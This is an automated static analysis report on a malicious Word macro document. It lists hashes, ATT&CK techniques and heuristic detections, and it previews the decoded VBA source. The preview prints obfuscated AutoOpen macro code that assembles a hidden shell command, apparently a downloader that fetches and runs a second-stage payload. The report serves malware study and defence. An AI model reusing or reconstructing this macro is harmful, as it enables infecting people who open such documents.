Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d24b8c467edd623f…

MALICIOUS

Office (OLE)

Size: 119.4 KB
Created: 2018-09-26 11:08:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 6ec5e70ac1c7292ca46a18991bdff1bc
SHA-1: db8163e60e1931dee91628d1d48eaade1c067338
SHA-256: d24b8c467edd623fc8ef8196b51ae0a84cee4ecd312eea01ff29d84077a7fbf3
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample triggers the critical OLE_VBA_SHELL heuristic, indicating a Shell() call within its VBA macros. An AutoOpen macro is also present and most likely invokes that Shell() call as soon as the document is opened. Together these suggest the document is designed to download and execute a second-stage payload, a common tactic for malware distribution.

Heuristics (6)

  • ClamAV: Doc.Malware.00536d-6698469-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.00536d-6698469-0
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 82006 bytes
SHA-256: e0c7dee2dfa3aa47622524d0f7c976b3b256cc5807a584fafabaf2c00a77ed57
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "vamcilNuwC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim GAljk(2)
GAljk(0) = Right(ZTDiElzE + uMEvrvRIHDuaBoEAzZj + EndJp, 802) + Left(lUKSAJ + lSbfkzGICzvELOsqDSqb + hJAmHBi, 789)
GAljk(1) = Mid(HHTbZo + nsiSMzDHTLnICDVwTAA + JKoDv, 341, 325) + MidB(qnauOwcn + LdITQzQXpDAnZCjvIp + sEDiHoZW, 618, 927)
   Dim qjDjRC(1)
qjDjRC(0) = Right(zDHjGSj + vWlzunhjoYaBDDMjimTQb + zLaMpiX, 484) + Left(NzwwWokN + zzDWVzuzcFLpVQU + CcOGznSn, 225)
   Dim CcllwH(1)
CcllwH(0) = MidB(midbLrCu + BYQPEUkzWiizuCh + rNLdMO, 486, 18) + Mid(wshjKa + YiQNKiIBucRoVcnMmDqh + hZpDfYZ, 536, 291) + Mid(IdCdVKwi + abQVRWNjhwwjcImWDpZLoD + iQstDvw, 139, 961) + Mid(OBLwfbr + aUDNKHUvPcSfmrosAkV + OXVstukw, 823, 776)
zFXmBLNzBwJ (KeyString(BqYEiuM + pABSFttr + 2 + 21 + 44 + IjPPM + iiTXD) + zHMKqd + XBODjpjj + KeyString(ABzwlbLn + iFSmT + 2 + 24 + 51 + zjiASJ + NAJkT) + cufAABVI + hwoQqzBBU + nRofiCztF + HLHQHztCl + wINiut + IkKuW + NGddN + fjwbAF + QjOjhonw)
   Dim FKJwm(1)
FKJwm(0) = Right(CGffbqc + LEwZjczwnGMwwfaF + jzKzz, 982) + Left(otmOfc + ldpiLwiPpAvPWOzfH + mQZhJuU, 953) + Left(NwtzPVs + jjHwTjsdAiwbQLIiqEKS + VkCSHs, 91) + Left(FriRF + REzwhliFpMOptwcwwqK + dzSKU, 259)
End Sub


Attribute VB_Name = "jamGVKo"
Function cufAABVI()
whKsd = "d \  \//\\\ " + "/V/C" + """" + "set -;],=a207" + " 7a02 2a70 a702 02a7"
Dim PCrOs(2)
PCrOs(0) = MidB(MlwPwF + YJORjjbIwafKFtdcA + kEwwHRv, 535, 832) + MidB(PahunjhI + PRKmvarUdJrvZnZpfjH + MqdKGuu, 850, 924)
PCrOs(1) = Mid(moJLqE + tpXiHkwISvDIaFzhPai + CFXddOwa, 497, 710) + MidB(oLVZlwmZ + LYKjGtXrKYbcCMrSVdXDml + HdcwrvN, 883, 979) + Right(IFDipzSM + NtfsGfnVXwNNTNjjP + YZlOSv, 664) + MidB(YJHukz + QBGdvvvmVVlmjUVFGrMQFR + DLVdWJ, 916, 305)
   Dim VYtYlJ(1)
VYtYlJ(0) = Left(ukztTd + nSBlzKYtOijvwKYYLoRm + ZSdQCQj, 32) + MidB(oCQLn + OPjdbwZauEvIWjrsucXww + tVGBNkE, 192, 45) + MidB(wwWDZbV + AiIKFvLBrRivolYhUq + JOOYVr, 61, 909) + Left(bmKNvw + sIKFvAJToDnHPBOwPZUwwoLT + rpcIfwqJ, 87)
jisifBfd = " 7a02 7a20 a207 7a20" + " 2a70 2a70 27a0 720a" + " 2a70 0a27 0a72 72a"
XAZaqVzjsd = "0 20a7}20a7}" + "a720{7a02h" + "0a72c027at720aa702" + "ac0a72}207a;70"
JMKKk = "2ak702aaa702e" + "a027r702aba072;2" + "7a0t20a7t7a0" + "2p02a7$2a07 a2" + "70m0a27ea7"
cufAABVI = whKsd + jisifBfd + XAZaqVzjsd + JMKKk
   Dim ZlECj(1)
ZlECj(0) = Right(BSivMtdI + zamVwljSGLuNolURTad + XzndAfBO, 289) + MidB(SiCbztWO + GkjiYHJmuVwzwwzmEwfrBu + tRaEOzJ, 317, 290)
   Dim FbvRs(2)
FbvRs(0) = Left(vWPBiim + TFZvCbQdMTnrqIpCwYw + RRjJipj, 814) + Mid(YijSK + fofmsjcdVpJUordk + hnfdj, 651, 342) + Left(piYosKlv + ChFUrGzEuroZmDAJIWO + fKLZRJCv, 102) + Right(ZbTnWtiN + BFlkuKlmqnIRohiurwjB + WhMmOoB, 274)
FbvRs(1) = Right(EapWzRJ + CRKiGbdTSARDXdZzA + uZKcUaL, 907) + Right(tUuMMCFK + iwqMBkizsJofQWiHDpXr + jutLaT, 790) + Left(Dwjwbj + ZidFpqbibDhwcoSpo + YUYQMYBW, 49) + MidB(dwIjS + DksrlhttGJJtdJJjYS + MZfWVL, 915, 865)
   Dim diqcfZ(1)
diqcfZ(0) = Mid(hspvuP + tDkAMrVrRswbqQFrbQPhq + VhNQaOfM, 48, 235) + MidB(XlIwB + OqrbjlfPjdVuIoiKqdT + EcIrGTRO, 380, 169) + Right(iFdiv + fYqjsKTUqXDuXHcnQ + PCliEq, 680) + Left(umDjPOt + pzzXwEibhWBIaUozNGZ + KcQrro, 181)
End Function
Function hwoQqzBBU()
hSWCXHTXia = "20t270aI70a2-72" + "a0e2a07k2a70o20a7va" + "027n207aI720a;a207)" + "72a0t7a20ta"
spUSrU = "702p027a$7a20 0" + "2a7,27a0ja270w072aLa" + "027$7a02(20a7e" + "2a70la072i70a2" + "F2a70d7a20a"
ojkic = "70a2o2a07l0a7" + "2n0a72w7a20o02a7D0" + "72a.2a07v70a2Y20a" + "7q07a2$0a72{2a70" + "ya207r27a0t2a70{27a" + "0)a720Qa720n2a07C7"
Dim YsXcwa(2)
YsXcwa(0) = MidB(EcCMqbY + tinSZQYqGznilEOLZDua + iQPONn, 520, 519) + MidB(cHJwcw + TUzWsamMMJDNwvzJwc + MsONdu, 310, 680) + Right(nHFWIXE + aORRVYtDdpSdkdizwrwc + MwIcmbF, 196) + MidB(JvaspjkM + UJGJlitriilicliQB + bHmpD, 743, 168)
YsXcwa(1) = Mid(jWzPC + qIiwSUOXtiMwCBMizW + GziauPl, 327, 144) + Right(rHTlpHt + JEvOFnSDUqcuhbBTIaca
... (truncated)